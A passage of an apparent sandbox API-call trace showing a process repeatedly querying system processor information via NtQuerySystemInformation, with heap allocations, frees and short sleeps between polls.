SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0307.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0307.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0307.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0307.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0307.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0307.006] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0307.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e1508 [0307.007] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e1508 | out: hHeap=0x2560000) returned 1 [0307.007] Sleep (dwMilliseconds=0x110) [0307.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0307.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0307.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0307.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0307.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0307.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0307.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0307.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0307.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27db4d8 [0307.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27db4d8 | out: hHeap=0x2560000) returned 1 [0307.017] Sleep (dwMilliseconds=0x110) [0307.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0307.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0307.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0307.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0307.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0307.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0307.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0307.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0307.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27df4f8 [0307.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27df4f8 | out: hHeap=0x2560000) returned 1 [0307.035] Sleep (dwMilliseconds=0x110) [0307.044] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0307.044] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.044] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0307.044] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0307.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0307.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0307.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0307.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0307.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0307.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e2510 [0307.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e2510 | out: hHeap=0x2560000) returned 1 [0307.050] Sleep (dwMilliseconds=0x110) [0307.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0307.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0307.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0307.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0307.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0307.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0307.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0307.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0307.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e1508 [0307.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e1508 | out: hHeap=0x2560000) returned 1 [0307.066] Sleep (dwMilliseconds=0x110) [0307.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0307.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0307.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0307.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0307.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0307.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0307.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0307.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0307.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e0500 [0307.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e0500 | out: hHeap=0x2560000) returned 1 [0307.083] Sleep (dwMilliseconds=0x110) [0307.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0307.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0307.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0307.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0307.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0307.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0307.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0307.098] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0307.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27dc4e0 [0307.099] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27dc4e0 | out: hHeap=0x2560000) returned 1 [0307.099] Sleep (dwMilliseconds=0x110) [0307.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0307.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0307.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0307.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0307.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0307.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0307.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0307.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0307.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27df4f8 [0307.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27df4f8 | out: hHeap=0x2560000) returned 1 [0307.145] Sleep (dwMilliseconds=0x110) [0307.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0307.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0307.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0307.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0307.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0307.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0307.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0307.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0307.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e0500 [0307.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e0500 | out: hHeap=0x2560000) returned 1 [0307.156] Sleep (dwMilliseconds=0x110) [0307.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0307.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0307.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0307.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0307.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0307.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0307.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0307.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0307.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27dd4e8 [0307.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27dd4e8 | out: hHeap=0x2560000) returned 1 [0307.177] Sleep (dwMilliseconds=0x110) [0307.185] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0307.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0307.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0307.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0307.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0307.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0307.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0307.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0307.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27db4d8 [0307.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27db4d8 | out: hHeap=0x2560000) returned 1 [0307.191] Sleep (dwMilliseconds=0x110) [0307.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0307.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0307.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0307.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0307.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0307.207] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0307.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0307.207] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0307.208] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27dd4e8 [0307.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27dd4e8 | out: hHeap=0x2560000) returned 1 [0307.208] Sleep (dwMilliseconds=0x110) [0307.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0307.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0307.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0307.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0307.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0307.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0307.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0307.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0307.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e1508 [0307.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e1508 | out: hHeap=0x2560000) returned 1 [0307.222] Sleep (dwMilliseconds=0x110) [0307.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0307.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0307.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0307.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0307.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0307.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0307.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0307.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0307.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e1508 [0307.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e1508 | out: hHeap=0x2560000) returned 1 [0307.237] Sleep (dwMilliseconds=0x110) 